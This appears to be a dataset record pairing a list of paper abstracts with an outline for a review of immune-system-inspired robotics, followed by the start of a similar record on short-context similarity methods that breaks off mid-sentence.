corresponds to a specific antibody and describes a particular control action for the robot. The antigens are the current state of the robot, read from a set of internal and external sensors. The network dynamics corresponds to the variation of antibody concentration levels, which change according to both mutual interaction of antibody nodes and of antibodies and antigens. It is proposed an evolutionary mechanism to determine the network configuration, that is, the parameters that define those interactions. Simulation results suggest that the proposal presented is very promising. --- paper_title: Plan on Obstacle-Avoiding Path for Mobile Robots Based on Artificial Immune Algorithm paper_content: This paper aims to plan the obstacle-avoiding path for mobile robots based on the Artificial Immune Algorithm (AIA) developed from the immune principle; AIA has a strong parallel processing, learning and memorizing ability. This study will design and control a mobile robot within a limited special scale. Through a research method based on the AIA, this study will find out the optimum obstacle-avoiding path. The main purpose of this study is to make it possible for the mobile robot to reach the target object safely and successfully fulfill its task through optimal path and with minimal rotation angle and best learning efficiency. In the end, through the research method proposed and the experimental results, it will become obvious that the application of the AIA after improvement in the obstacle-avoiding path planning for mobile robots is really effective. --- paper_title: A robot with a decentralized consensus-making mechanism based on the immune system paper_content: In recent years much attention has been focused on behavior-based artificial intelligence (AI), which has already demonstrated its robustness and flexibility against dynamically changing world. However, in this approach, the followings have not yet been resolved: how do we construct an appropriate arbitration mechanism, and how do we prepare appropriate competence modules. In this paper, to overcome these problems, we propose a new decentralised consensus-making system inspired by the biological immune system. And we apply our proposed method to behavior arbitration for an autonomous mobile robot, namely garbage collecting problem that takes into account the concept of self-sufficiency. To verify the feasibility of our method, we carry out some simulations. In addition, we investigate two types of adaptation mechanisms, and try to evolve the proposed artificial immune network using reinforcement signals. --- paper_title: Immune network control for stigmergy based foraging behaviour of autonomous mobile robots paper_content: The paper presents a series of experiments in a simulated environment where two autonomous mobile robots gather randomly distributed objects and cluster them on a pile. The co-ordination of the robots' movements is achieved through stigmergy (an indirect form of communication through the environment). The random moves, necessary for stigmergy based foraging behaviour, make the task solution a time consuming process. In order to speed up the foraging behaviour, the immune network robot control is proposed. Stigmergic principles are coded in two artificial immune networks—for a collision free goal following behaviour and for an object picking up/dropping behaviour. Simulations confirm the improved performance of the foraging behaviour under the proposed immune network control. Copyright © 2006 John Wiley & Sons, Ltd. --- paper_title: Artificial Immune System based Cooperative Strategies for Robot Soccer Competition paper_content: This study proposes an immune network based cooperative strategy for robot soccer systems. The strategy enables robots to select proper behaviors from `shot', `pass', `kick', `chase', `track', and `guard'. In addition, the proposed layered immune network achieves cooperation and coordination between each robot. The proposed architecture is evaluated on the SimuroSot Middle league, a 5-vs-5 simulation platform in FIRA. --- paper_title: An immune learning classifier network for autonomous navigation paper_content: This paper proposes a non-parametric hybrid system for autonomous navigation combining the strengths of learning classifier systems, evolutionary algorithms, and an immune network model. The system proposed is basically an immune network of classifiers, named CLARINET. CLARINET has three degrees of freedom: the attributes that define the network cells (classifiers) are dynamically adjusted to a changing environment; the network connections are evolved using an evolutionary algorithm; and the concentration of network nodes is varied following a continuous dynamic model of an immune network. CLARINET is described in detail, and the resultant hybrid system demonstrated effectiveness and robustness in the experiments performed, involving the computational simulation of robotic autonomous navigation. --- paper_title: AIS Based Robot Navigation in a Rescue Scenario paper_content: An architecture for a robot control is proposed which is based on the requirements from the RoboCup and AAAI Rescue Robot Competition. An artificial immune system comprises the core component. The suitability of this architecture for the competition and related scenarios, including the modelling of the environment, was verified by simulation. --- paper_title: The danger model: A renewed sense of self paper_content: For over 50 years immunologists have based their thoughts, experiments, and clinical treatments on the idea that the immune system functions by making a distinction between self and nonself. Although this paradigm has often served us well, years of detailed examination have revealed a number of inherent problems. This Viewpoint outlines a model of immunity based on the idea that the immune system is more concerned with entities that do damage than with those that are foreign. --- paper_title: Two-Timescale Learning Using Idiotypic Behaviour Mediation For A Navigating Mobile Robot paper_content: A combined Short-Term Learning (STL) and Long-Term Learning (LTL) approach to solving mobile-robot navigation problems is presented and tested in both the real and virtual domains. The LTL phase consists of rapid simulations that use a Genetic Algorithm to derive diverse sets of behaviours, encoded as variable sets of attributes, and the STL phase is an idiotypic Artificial Immune System. Results from the LTL phase show that sets of behaviours develop very rapidly, and significantly greater diversity is obtained when multiple autonomous populations are used, rather than a single one. The architecture is assessed under various scenarios, including removal of the LTL phase and switching off the idiotypic mechanism in the STL phase. The comparisons provide substantial evidence that the best option is the inclusion of both the LTL phase and the idiotypic system. In addition, this paper shows that structurally different environments can be used for the two phases without compromising transferability. --- paper_title: An immune learning classifier network for autonomous navigation paper_content: This paper proposes a non-parametric hybrid system for autonomous navigation combining the strengths of learning classifier systems, evolutionary algorithms, and an immune network model. The system proposed is basically an immune network of classifiers, named CLARINET. CLARINET has three degrees of freedom: the attributes that define the network cells (classifiers) are dynamically adjusted to a changing environment; the network connections are evolved using an evolutionary algorithm; and the concentration of network nodes is varied following a continuous dynamic model of an immune network. CLARINET is described in detail, and the resultant hybrid system demonstrated effectiveness and robustness in the experiments performed, involving the computational simulation of robotic autonomous navigation. --- paper_title: Genetic-Algorithm Seeding Of Idiotypic Networks For Mobile-Robot Navigation paper_content: Robot-control designers have begun to exploit the properties of the human immune system in order to ::: produce dynamic systems that can adapt to complex, varying, real-world tasks. Jerne’s idiotypic-network theory has proved the most popular artificial-immune-system (AIS) method for incorporation into behaviour-based robotics, since idiotypic selection produces highly adaptive responses. However, previous efforts have mostly focused on evolving the network connections and have often worked with a single, preengineered set of behaviours, limiting variability. This paper describes a method for encoding behaviours as a variable set of attributes, and shows that when the encoding is used with a genetic algorithm (GA), multiple sets of diverse behaviours can develop naturally and rapidly, providing much greater scope for flexible behaviour-selection. The algorithm is tested extensively with a simulated e-puck robot that navigates around a maze by tracking colour. Results show that highly successful behaviour sets can be generated within about 25 minutes, and that much greater diversity can be obtained when multiple autonomous populations are used, rather than a single one. --- paper_title: Artificial immune network-based cooperative control in collective autonomous mobile robots paper_content: In this paper, we propose a method of cooperative control based on immune system in distributed autonomous robotic system (DARS). Immune system is living body's self-protection and self-maintenance system. Thus these features can be applied to decision making of optimal swarm behavior in dynamically changing environment. For the purpose of applying the immune system to DARS, a robot is regarded as a B lymphocyte (B cell), each environmental condition as an antigen and a behavior strategy as an antibody respectively. The executing process of proposed method is as follows: when the environmental condition changes, a robot selects an appropriate behavior strategy, and its behavior strategy is stimulated and suppressed by other robot using communication. Finally, such stimulated strategy is adopted as a swarm behavior strategy. This control scheme is based on clonal selection and idiotopic network hypothesis, and it is used for decision making of an optimal swarm strategy. --- paper_title: Realization of cooperative strategies and swarm behavior in distributed autonomous robotic systems using artificial immune system paper_content: In this paper, we propose a method of cooperative control (T-cell modeling) and selection of group behavior strategy (B-cell modeling) based on the immune system in a distributed autonomous robotic system (DARS). The immune system is a living body's self-protection and self-maintenance system. These features can be applied to decision making of optimal swarm behavior in a dynamically changing environment. To apply the immune system to DARS, a robot is regarded as a B-cell, each environmental condition as an antigen, a behavior strategy as an antibody and control parameter as a T-cell respectively. When the environmental condition changes, a robot selects an appropriate behavior strategy, and its behavior strategy is stimulated and suppressed by other robots using communication. Finally, the most stimulated strategy is adopted as the swarm behavior strategy. This control scheme is based on clonal selection and idiotopic network hypothesis. It is used for decision making of the optimal swarm strategy. By T-cell modeling, the adaptation ability of the robot is enhanced in dynamic environments. --- paper_title: Applying synthesized immune networks hypothesis to mobile robots paper_content: Based on the analogies between multi autonomous robots system (MARS) and immune system, a synthesized immune networks hypothesis and the algorithm to solve the route planning and cooperation problem on MARS are proposed. The route planning and cooperation problem is transformed to the interaction mechanism among antibody, antigen and small-scaled immune networks. The pursuit problem is used to validate the hypothesis. Simulation results suggest that the proposal is promising. --- paper_title: Plan on Obstacle-Avoiding Path for Mobile Robots Based on Artificial Immune Algorithm paper_content: This paper aims to plan the obstacle-avoiding path for mobile robots based on the Artificial Immune Algorithm (AIA) developed from the immune principle; AIA has a strong parallel processing, learning and memorizing ability. This study will design and control a mobile robot within a limited special scale. Through a research method based on the AIA, this study will find out the optimum obstacle-avoiding path. The main purpose of this study is to make it possible for the mobile robot to reach the target object safely and successfully fulfill its task through optimal path and with minimal rotation angle and best learning efficiency. In the end, through the research method proposed and the experimental results, it will become obvious that the application of the AIA after improvement in the obstacle-avoiding path planning for mobile robots is really effective. --- paper_title: An immunological approach to mobile robot reactive navigation paper_content: In this paper, a reactive immune network (RIN) is proposed and employed for mobile robot navigation within unknown environments. Rather than building a detailed mathematical model of artificial immune systems, this study tries to explore the principle in an immune network focusing on its self-organization, adaptive learning capability, and immune feedback. In addition, an adaptive virtual target method is integrated to solve the local minima problem in navigation. Several trapping situations designed by the early researchers are adopted to evaluate the performance of the proposed architecture. Simulation results show that the mobile robot is capable of avoiding obstacles, escaping traps, and reaching the goal efficiently and effectively. --- paper_title: Behavior-based intelligent mobile robot using an immunized reinforcement adaptive learning mechanism paper_content: Abstract In this paper, a novel immunized reinforcement adaptive learning mechanism employing a behavior-based knowledge and the on-line adapting capabilities of the immune system is proposed and applied to an intelligent mobile robot. Rather than building a detailed mathematical model of immune systems, we try to explore principles in the immune system focusing on its self-organization, adaptive capability and immune memory. Two levels of the immune system, underlying the ‘micro’ level of cell interactions, and emergent ‘macro’ level of the behavior of the system are investigated. To evaluate the proposed immunized architecture, a ‘food foraging work’ simulation environment containing a mobile robot, foods, with/without obstacles is created to simulate the real world. The simulation results validate several significant characteristics of the immunized architecture: adaptability, learning, self-organizing, and stable ecological niche approaching. --- paper_title: Artificial Immune System based Cooperative Strategies for Robot Soccer Competition paper_content: This study proposes an immune network based cooperative strategy for robot soccer systems. The strategy enables robots to select proper behaviors from `shot', `pass', `kick', `chase', `track', and `guard'. In addition, the proposed layered immune network achieves cooperation and coordination between each robot. The proposed architecture is evaluated on the SimuroSot Middle league, a 5-vs-5 simulation platform in FIRA. --- paper_title: Mobile Robot Path Planning Based on Artificial Immune Algorithm paper_content: * Corresponding author Email: [email protected] Abstract - This paper studies the application of artificial immune algorithm to mobile robot path planning inside a specified environment in real time. The biological immune system is firstly analyzed in a relatively deeper and all-sided point of view reflecting the fresh research in biology. Second, the motion characteristic of the car-like autonomous mobile robot is also analyzed. An immunity algorithm adapting capabilities of the artificial immune system is proposed and enable robot to reach the target object safely and successfully fulfill its task through optimal path and with minimal rotation angle efficiency. Finally, the simulation experiment results demonstrate that the proposed AIA based path plan approach behaves more successfully. --- paper_title: Research on Cooperative Strategies of Soccer Robots Based on Artificial Immune System paper_content: For one agent, the proper selection of its own actions or strategies is one key to the multi-agent system. A new method is presented to select actions cooperatively for soccer robots, which is regarded as a benchmark of multi-agent system. The perfect character of artificial immune system is made full use to improve the strategy of the soccer robot, dealing with information of the environment as antigen, certain action as antibody. Like biological immune system, the robot selects action (antibody) according to its own surroundings (antigen) to make robots complete their mission properly and cooperatively. Experiment results indicate the feasibility and effectiveness of the method. --- paper_title: An artificial immune system approach to mobile sensor networks and mine detection paper_content: The human immune system and its ability to continually develop and learn has been studied for many years. Its capacity to recognize its own cells (self), as well as those that pose a threat to the body's homeostasis (non-self) has lead to the creation of many algorithms that try to mimic this behavior. One of these algorithms is the artificial immune system (AIS). The foundation of AIS depends on the existence of both sensor and communication ranges (assumed circles) with which a single agent can collect and convey information to other agents within the range. It is the purpose of this paper to present a solution to the mine detection problem using cooperative mobile robots equipped with sensory and communication capabilities which allow the AIS approach to be utilized --- paper_title: Application of artificial immune system based intelligent multi agent model to a mine detection problem paper_content: Biological systems are sophisticated and intelligent information processing systems. They have inspired scientists and engineers to solve complex computational and information processing tasks. This paper presents a novel artificial immune system based intelligent multi agent model named AISIMAM. The model involves the behavioral management of artificial intelligence, namely multi agent systems and artificial immune systems. This paper outlines AISIMAM, concentrates on the mine detection application and discusses the results. --- paper_title: Control of the distributed autonomous robotic system based on the biologically inspired immunological architecture paper_content: In this paper, we propose a new algorithm to control a distributed autonomous robotic system under dynamically changing environment based on immunological interaction between robots. Our algorithm can organize the robot population for dynamically changing multiple works. At first, we designed a control architecture for a multiple robotic system based on B-cell (which is main agent of immune system) interaction. Immune system has various kinds of B-cells, and B-cell interaction can organize its population balance against dynamically changing environment. We set the analogy between distributed autonomous robotic system and biological immune system. We verified the performance of our algorithm by computer simulation. As a simulation example there is considered the transportation of multiple objects to multiple locations against a deadline, with time-varying demand. --- paper_title: Artificial Dendritic Cells: Multi-faceted Perspectives paper_content: Dendritic cells are the crime scene investigators of the human immune system. Their function is to correlate potentially anomalous invading entities with observed damage to the body. The detection of such invaders by dendritic cells results in the activation of the adaptive immune system, eventually leading to the removal of the invader from the host body. This mechanism has provided inspiration for the development of a novel bio-inspired algorithm, the Dendritic Cell Algorithm. This algorithm processes information at multiple levels of resolution, resulting in the creation of information granules of variable structure. In this chapter we examine the multi-faceted nature of immunology and how research in this field has shaped the function of the resulting Dendritic Cell Algorithm. A brief overview of the algorithm is given in combination with the details of the processes used for its development. The chapter is concluded with a discussion of the parallels between our understanding of the human immune system and how such knowledge influences the design of artificial immune systems. --- paper_title: A goalkeeper strategy in robot soccer based on Danger Theory paper_content: Artificial Immune Systems (AIS) have been successfully modeled and implemented in several engineering applications. In this work, a goalkeeper strategy in robot soccer based on Danger Theory is proposed. Danger Theory is a recent immune theory which has not been widely applied so far. The proposed strategy is implemented and evaluated using middle league SIMUROSOT from FIRA. Experiments carried out yielded promising results. --- paper_title: Articulation and Clarification of the Dendritic Cell Algorithm paper_content: The Dendritic Cell algorithm (DCA) is inspired by recent work in innate immunity. In this paper a formal description of the DCA is given. The DCA is described in detail, and its use as an anomaly detector is illustrated within the context of computer security. A port scan detection task is performed to substantiate the influence of signal selection on the behaviour of the algorithm. Experimental results provide a comparison of differing input signal mappings. --- paper_title: Danger Theory: The Link between AIS and IDS? paper_content: We present ideas about creating a next generation Intrusion Detection System based on the latest immunological theories. The central challenge with computer security is determining the difference between normal and potentially harmful activity. For half a century, developers have protected their systems by coding rules that identify and block specific events. However, the nature of current and future threats in conjunction with ever larger IT systems urgently requires the development of automated and adaptive defensive tools. A promising solution is emerging in the form of Artificial Immune Systems. The Human Immune System can detect and defend against harmful and previously unseen invaders, so can we not build a similar Intrusion Detection System for our computers. --- paper_title: The Deterministic Dendritic Cell Algorithm paper_content: The Dendritic Cell Algorithm is an immune-inspired algorithm originally based on the function of natural dendritic cells. The original instantiation of the algorithm is a highly stochastic algorithm. While the performance of the algorithm is good when applied to large real-time datasets, it is difficult to analyse due to the number of random-based elements. In this paper a deterministic version of the algorithm is proposed, implemented and tested using a port scan dataset to provide a controllable system. This version consists of a controllable amount of parameters, which are experimented with in this paper. In addition the effects are examined of the use of time windows and variation on the number of cells, both which are shown to influence the algorithm. Finally a novel metric for the assessment of the algorithms output is introduced and proves to be a more sensitive metric than the metric used with the original Dendritic Cell Algorithm. --- paper_title: The Application of a Dendritic Cell Algorithm to a Robotic Classifier paper_content: The dendritic cell algorithm is an immune-inspired technique for processing time-dependant data. Here we propose it as a possible solution for a robotic classification problem. The dendritic cell algorithm is implemented on a real robot and an investigation is performed into the effects of varying the migration threshold median for the cell population. The algorithm performs well on a classification task with very little tuning. Ways of extending the implementation to allow it to be used as a classifier within the field of robotic security are suggested. --- paper_title: Multi-robot Exploration Based on Market Approach and Immune Optimizing Strategy paper_content: A multi-robot system is used to explore an environment and create a map based on market approach. Data fusion is performed using Bayes theorem and then the local maps are updated. A diffusivity concept is defined to describe the robots' extent apart from one another. The immune optimizing strategy is introduced to select goal points since it is a problem of optimized combination. In order to minimize repeated coverage and improve the exploration efficiency, the evaluation function considers the cost, revenue and diffusivity. Simulation examples show that the proposed method is effective for the stated problem and the immune optimizing strategy is more efficient than other strategies. --- paper_title: Real-time obstacle avoidance for manipulators and mobile robots paper_content: This paper presents a unique real-time obstacle avoidance approach for manipulators and mobile robots based on the "artificial potential field" concept. In this approach, collision avoidance, traditionally considered a high level planning problem, can be effectively distributed between different levels of control, allowing real-time robot operations in a complex environment. We have applied this obstacle avoidance scheme to robot arm using a new approach to the general problem of real-time manipulator control. We reformulated the manipulator control problem as direct control of manipulator motion in operational space-the space in which the task is originally described-rather than as control of the task's corresponding joint space motion obtained only after geometric and kinematic transformation. This method has been implemented in the COSMOS system for a PUMA 560 robot. Using visual sensing, real-time collision avoidance demonstrations on moving obstacles have been performed. --- paper_title: Decentralized control system for autonomous navigation based on an evolved artificial immune network paper_content: This paper investigates an autonomous control system of a mobile robot based on the immune network theory. The immune network navigates the robot to solve a multiobjective task, namely, garbage collection: the robot must find and collect garbage, while it establishes a trajectory without colliding with obstacles, and return to the base before it runs out of energy. Each network node corresponds to a specific antibody and describes a particular control action for the robot. The antigens are the current state of the robot, read from a set of internal and external sensors. The network dynamics corresponds to the variation of antibody concentration levels, which change according to both mutual interaction of antibody nodes and of antibodies and antigens. It is proposed an evolutionary mechanism to determine the network configuration, that is, the parameters that define those interactions. Simulation results suggest that the proposal presented is very promising. --- paper_title: Plan on Obstacle-Avoiding Path for Mobile Robots Based on Artificial Immune Algorithm paper_content: This paper aims to plan the obstacle-avoiding path for mobile robots based on the Artificial Immune Algorithm (AIA) developed from the immune principle; AIA has a strong parallel processing, learning and memorizing ability. This study will design and control a mobile robot within a limited special scale. Through a research method based on the AIA, this study will find out the optimum obstacle-avoiding path. The main purpose of this study is to make it possible for the mobile robot to reach the target object safely and successfully fulfill its task through optimal path and with minimal rotation angle and best learning efficiency. In the end, through the research method proposed and the experimental results, it will become obvious that the application of the AIA after improvement in the obstacle-avoiding path planning for mobile robots is really effective. --- paper_title: A robot with a decentralized consensus-making mechanism based on the immune system paper_content: In recent years much attention has been focused on behavior-based artificial intelligence (AI), which has already demonstrated its robustness and flexibility against dynamically changing world. However, in this approach, the followings have not yet been resolved: how do we construct an appropriate arbitration mechanism, and how do we prepare appropriate competence modules. In this paper, to overcome these problems, we propose a new decentralised consensus-making system inspired by the biological immune system. And we apply our proposed method to behavior arbitration for an autonomous mobile robot, namely garbage collecting problem that takes into account the concept of self-sufficiency. To verify the feasibility of our method, we carry out some simulations. In addition, we investigate two types of adaptation mechanisms, and try to evolve the proposed artificial immune network using reinforcement signals. --- paper_title: An immune learning classifier network for autonomous navigation paper_content: This paper proposes a non-parametric hybrid system for autonomous navigation combining the strengths of learning classifier systems, evolutionary algorithms, and an immune network model. The system proposed is basically an immune network of classifiers, named CLARINET. CLARINET has three degrees of freedom: the attributes that define the network cells (classifiers) are dynamically adjusted to a changing environment; the network connections are evolved using an evolutionary algorithm; and the concentration of network nodes is varied following a continuous dynamic model of an immune network. CLARINET is described in detail, and the resultant hybrid system demonstrated effectiveness and robustness in the experiments performed, involving the computational simulation of robotic autonomous navigation. --- paper_title: An Information-Theoretic Approach for Clonal Selection Algorithms paper_content: In this research work a large set of the classical numerical functions were taken into account in order to understand both the search capability and the ability to escape from a local optimal of a clonal selection algorithm, called i-CSA. The algorithm was extensively compared against several variants of Differential Evolution (DE) algorithm, and with some typical swarm intelligence algorithms. The obtained results show as i-CSA is effective in terms of accuracy, and it is able to solve large-scale instances of well-known benchmarks. Experimental results also indicate that the algorithm is comparable, and often outperforms, the compared nature-inspired approaches. From the experimental results, it is possible to note that a longer maturation of a B cell, inside the population, assures the achievement of better solutions; the maturation period affects the diversity and the effectiveness of the immune search process on a specific problem instance. To assess the learning capability during the evolution of the algorithm three different relative entropies were used: Kullback-Leibler, Renyi generalized and Von Neumann divergences. The adopted entropic divergences show a strong correlation between optima discovering, and high relative entropy values. --- paper_title: A hybrid immune evolutionary computation based on immunity and clonal selection for concurrent mapping and localization paper_content: This paper addresses the problem of Concurrent Mapping and Localization(CML) by means of a hybrid immune evolutionary computation based on immunity and clonal selection for a mobile robot. An immune operator, a vaccination operator, is designed in the algorithm. The experiment results of a real mobile robot show that the computational expensiveness of the algorithm in this paper is less than other algorithms and the maps obtained are very accurate. --- paper_title: An evolutionary algorithm with population immunity and its application on autonomous robot control paper_content: The natural immune system is an important resource full of inspirations for the theory researchers and the engineering developers to design some powerful information processing methods aiming at difficult problems. Based on this consideration, a novel optimal-searching algorithm, the immune mechanism based evolutionary algorithm - IMEA, is proposed for the purpose of finding an optimal/quasi-optimal solution in a multi-dimensional space. Different from the ordinary evolutionary algorithms, on one hand, due to the long-term memory, IMEA has a better capability of learning from its experience, and on the other hand, with the clonal selection, it is able to keep from the premature convergence of population. With the simulation on autonomous robot control, it is proved that IMEA is good at the task of adaptive adjustment (offline), and it can improve the robot's capability of reinforcement learning, so as to make itself able to sense its surrounding dynamic environment. --- paper_title: Improved Pattern Recognition with Artificial Clonal Selection? paper_content: In this paper, we examine the clonal selection algorithm CLONALG and the suggestion that it is suitable for pattern recognition. CLONALG is tested over a series of binary character recognition tasks and its performance compared to a set of basic binary matching algorithms. A number of enhancements are made to the algorithm to improve its performance and the classification tests are repeated. Results show that given enough data CLONALG can successfully classify previously unseen patterns and that adjustments to the existing algorithm can improve performance. --- paper_title: Theoretical advances in artificial immune systems paper_content: Artificial immune systems (AIS) constitute a relatively new area of bio-inspired computing. Biological models of the natural immune system, in particular the theories of clonal selection, immune networks and negative selection, have provided the inspiration for AIS algorithms. Moreover, such algorithms have been successfully employed in a wide variety of different application areas. However, despite these practical successes, until recently there has been a dearth of theory to justify their use. In this paper, the existing theoretical work on AIS is reviewed. After the presentation of a simple example of each of the three main types of AIS algorithm (that is, clonal selection, immune network and negative selection algorithms respectively), details of the theoretical analysis for each of these types are given. Some of the future challenges in this area are also highlighted. --- paper_title: The 'complete' idiotype network is an absurd immune system. paper_content: Idiotypic networks have attained the status of unavoidable necessities in the regulation of immune responses. In this article Rod Langman and Mel Cohn contend that the conceptual foundations for such idiotypic networks are formal absurdities. --- paper_title: AIS Based Robot Navigation in a Rescue Scenario paper_content: An architecture for a robot control is proposed which is based on the requirements from the RoboCup and AAAI Rescue Robot Competition. An artificial immune system comprises the core component. The suitability of this architecture for the competition and related scenarios, including the modelling of the environment, was verified by simulation. --- paper_title: Danger Theory: The Link between AIS and IDS? paper_content: We present ideas about creating a next generation Intrusion Detection System based on the latest immunological theories. The central challenge with computer security is determining the difference between normal and potentially harmful activity. For half a century, developers have protected their systems by coding rules that identify and block specific events. However, the nature of current and future threats in conjunction with ever larger IT systems urgently requires the development of automated and adaptive defensive tools. A promising solution is emerging in the form of Artificial Immune Systems. The Human Immune System can detect and defend against harmful and previously unseen invaders, so can we not build a similar Intrusion Detection System for our computers. --- paper_title: Soft Computing-Based Navigation Schemes for a Real Wheeled Robot Moving Among Static Obstacles paper_content: Collision-free, time-optimal navigation of a real wheeled robot in the presence of some static obstacles is undertaken in the present study. Two soft computing-based approaches, namely genetic-fuzzy system and genetic-neural system and a conventional potential field approach have been developed for this purpose. Training is given to the soft computing-based navigation schemes off-line and the performance of the optimal motion planner is tested on a real robot. A CCD camera is used to collect information of the environment. After processing the collected data, the communication between the robot and the host computer is obtained with the help of a radio-frequency module. Both the soft computing-based approaches are found to perform better than the potential field method in terms of the traveling time taken by the robot. Moreover, the performance of fuzzy logic-based motion planner is found to be comparable with that of neural network-based motion planner, although the training of the former is seen to be computationally less expensive than the latter. Sometimes the potential field method is unable to yield any feasible solution, specifically when the obstacle is found to be just ahead of the robot, whereas soft computing-based approaches have tackled such a situation well. --- paper_title: Solving the potential field local minimum problem using internal agent states paper_content: We propose a new, extended artificial potential field method, which uses dynamic internal agent states. The internal states are modeled as a dynamical system of coupled first order differential equations that manipulate the potential field in which the agent is situated. The internal state dynamics are forced by the interaction of the agent with the external environment. Local equilibria in the potential field are then manipulated by the internal states and transformed from stable equilibria to unstable equilibria, allowing escape from local minima in the potential field. This new methodology successfully solves reactive path planning problems, such as a complex maze with multiple local minima, which cannot be solved using conventional static potential fields. --- paper_title: An immunological approach to mobile robot reactive navigation paper_content: In this paper, a reactive immune network (RIN) is proposed and employed for mobile robot navigation within unknown environments. Rather than building a detailed mathematical model of artificial immune systems, this study tries to explore the principle in an immune network focusing on its self-organization, adaptive learning capability, and immune feedback. In addition, an adaptive virtual target method is integrated to solve the local minima problem in navigation. Several trapping situations designed by the early researchers are adopted to evaluate the performance of the proposed architecture. Simulation results show that the mobile robot is capable of avoiding obstacles, escaping traps, and reaching the goal efficiently and effectively. --- paper_title: Swarm Robotics: From Sources of Inspiration to Domains of Application paper_content: Swarm robotics is a novel approach to the coordination of large numbers of relatively simple robots which takes its inspiration from social insects. This paper proposes a definition to this newly emerg- ing approach by 1) describing the desirable properties of swarm robotic systems, as observed in the system-level functioning of social insects, 2) proposing a definition for the term swarm robotics, and putting for- ward a set of criteria that can be used to distinguish swarm robotics research from other multi-robot studies, 3) providing a review of some studies which can act as sources of inspiration, and a list of promising domains for the utilization of swarm robotic systems. --- paper_title: Virtual local target method for avoiding local minimum in potential field based robot navigation paper_content: A novel robot navigation algorithm with global path generation capability is presented. Local minimum is a most intractable but is an encountered frequently problem in potential field based robot navigation.Through appointing appropriately some virtual local targets on the journey, it can be solved effectively. The key concept employed in this algorithm are the rules that govern when and how to appoint these virtual local targets. When the robot finds itself in danger of local minimum, a virtual local target is appointed to replace the global goal temporarily according to the rules. After the virtual target is reached, the robot continues on its journey by heading towards the global goal. The algorithm prevents the robot from running into local minima anymore. Simulation results showed that it is very effective in complex obstacle environments. ---
Title: Immuno-inspired robotic applications: a review Section 1: Introduction Description 1: Summarize the background, motivation, and structure of the paper. Section 2: AIS Definitions Description 2: Provide an overview of various AIS models and their relevance to robotic applications. Section 3: Clonal Selection Description 3: Describe the clonal selection theory, its computational interpretation, and its general algorithm. Section 4: Immune Network Description 4: Discuss the immune network theory, its computational interpretation, and its general algorithm. Section 5: Danger Theory Description 5: Explain the danger theory, its computational interpretation, and its general algorithm. Section 6: AIS-based Robotic Applications Description 6: Categorize and describe various AIS-based robotic applications and their computational details, including applications using clonal selection, immune network, danger theory, and other approaches. Section 7: Using AIS Description 7: Analyze the effectiveness of AIS in robotic applications, covering various findings and their implications. Section 8: On immuno-inspired robotics Description 8: Discuss the current trends, challenges, and future directions in immuno-inspired robotics. Section 9: Conclusions Description 9: Summarize the key insights, gaps, and potential future research directions in the field of immuno-inspired robotic applications.
Computational Approaches to Measuring the Similarity of Short Contexts : A Review of Applications and Methods
20
--- paper_title: Bleu: A Method For Automatic Evaluation Of Machine Translation paper_content: Human evaluations of machine translation are extensive but expensive. Human evaluations can take months to finish and involve human labor that can not be reused. We propose a method of automatic machine translation evaluation that is quick, inexpensive, and language-independent, that correlates highly with human evaluation, and that has little marginal cost per run. We present this method as an automated understudy to skilled human judges which substitutes for them when there is need for quick or frequent evaluations. --- paper_title: Understanding The Thematic Structure Of The Qur'an: An Exploratory Multivariate Approach paper_content: In this paper, we develop a methodology for discovering the thematic structure of the Qur'an based on a fundamental idea in data mining and related disciplines: that, with respect to some collection of texts, the lexical frequency profiles of the individual texts are a good indicator of their conceptual content, and thus provide a reliable criterion for their classification relative to one another. This idea is applied to the discovery of thematic interrelationships among the suras (chapters) of the Qur'an by abstracting lexical frequency data from them and then applying hierarchical cluster analysis to that data. The results reported here indicate that the proposed methodology yields usable results in understanding the Qur'an on the basis of its lexical semantics. --- paper_title: Disambiguation by short contexts paper_content: This paper describes a technique that we believe can be of great help in many text-processing situations, and reports on an experiment recently conducted to test its validity and scope. As a background we shall present in the following sections some fundamental clarifications and remarks on our specific view of lemmatization and disambiguation. Our starting point is the double assertion that we believe would be shared by many workers in applied computational linguistics and large text-processing projects, to wit: that on the one hand lemmatization is one of the most important and crucial steps in many non-trivial text-processing cycles, but on the other hand, no operational, reasonably general, fully automatic and high-quality context-sensitive text-lemmatization system nowadays is easily accessible for any natural language. Given these two premises, the problem is how to introduce a partial element (at least) of machineaided work in the process of text-lemmatization, so as to avoid the extremely laborious and frustrating task of a word-per-word manual lemmatization of large corpora as was done in the early days of automatic text-processing projects. (For a thorough report on mechanical lemmatization programs, see ref. 4.) In this paper we focus on the analysis and experimental testing of one idea that fits naturally into this framework, namely that of disambiguation by short contexts. (The somewhat unexpected shift from "lemmatization" to "disambiguation" will be justified in the sections to come.) Based on --- paper_title: Experiments in automatic statistical thesaurus construction paper_content: A well constructed thesaurus has long been recognized as a valuable tool in the effective operation of an information retrieval system. This paper reports the results of experiments designed to determine the validity of an approach to the automatic construction of global thesauri (described originally by Crouch in [1] and [2] based on a clustering of the document collection. The authors validate the approach by showing that the use of thesauri generated by this method results in substantial improvements in retrieval effectiveness in four test collections. The term discrimination value theory, used in the thesaurus generation algorithm to determine a term's membership in a particular thesaurus class, is found not to be useful in distinguishing a “good” from an “indifferent” or “poor” thesaurus class). In conclusion, the authors suggest an alternate approach to automatic thesaurus construction which greatly simplifies the work of producing viable thesaurus classes. Experimental results show that the alternate approach described herein in some cases produces thesauri which are comparable in retrieval effectiveness to those produced by the first method at much lower cost. --- paper_title: Bleu: A Method For Automatic Evaluation Of Machine Translation paper_content: Human evaluations of machine translation are extensive but expensive. Human evaluations can take months to finish and involve human labor that can not be reused. We propose a method of automatic machine translation evaluation that is quick, inexpensive, and language-independent, that correlates highly with human evaluation, and that has little marginal cost per run. We present this method as an automated understudy to skilled human judges which substitutes for them when there is need for quick or frequent evaluations. --- paper_title: Concept based query expansion paper_content: Query expansion methods have been studied for a long time - with debatable success in many instances. In this paper we present a probabilistic query expansion model based on a similarity thesaurus which was constructed automatically. A similarity thesaurus reflects domain knowledge about the particular collection from which it is constructed. We address the two important issues with query expansion: the selection and the weighting of additional search terms. In contrast to earlier methods, our queries are expanded by adding those terms that are most similar to the concept of the query, rather than selecting terms that are similar to the query terms. Our experiments show that this kind of query expansion results in a notable improvement in the retrieval effectiveness when measured using both recall-precision and usefulness. --- paper_title: Using WordNet-Based Context Vectors To Estimate The Semantic Relatedness Of Concepts paper_content: In this paper, we introduce a WordNetbased measure of semantic relatedness by combining the structure and content of WordNet with co–occurrence information derived from raw text. We use the co–occurrence information along with the WordNet definitions to build gloss vectors corresponding to each concept in WordNet. Numeric scores of relatedness are assigned to a pair of concepts by measuring the cosine of the angle between their respective gloss 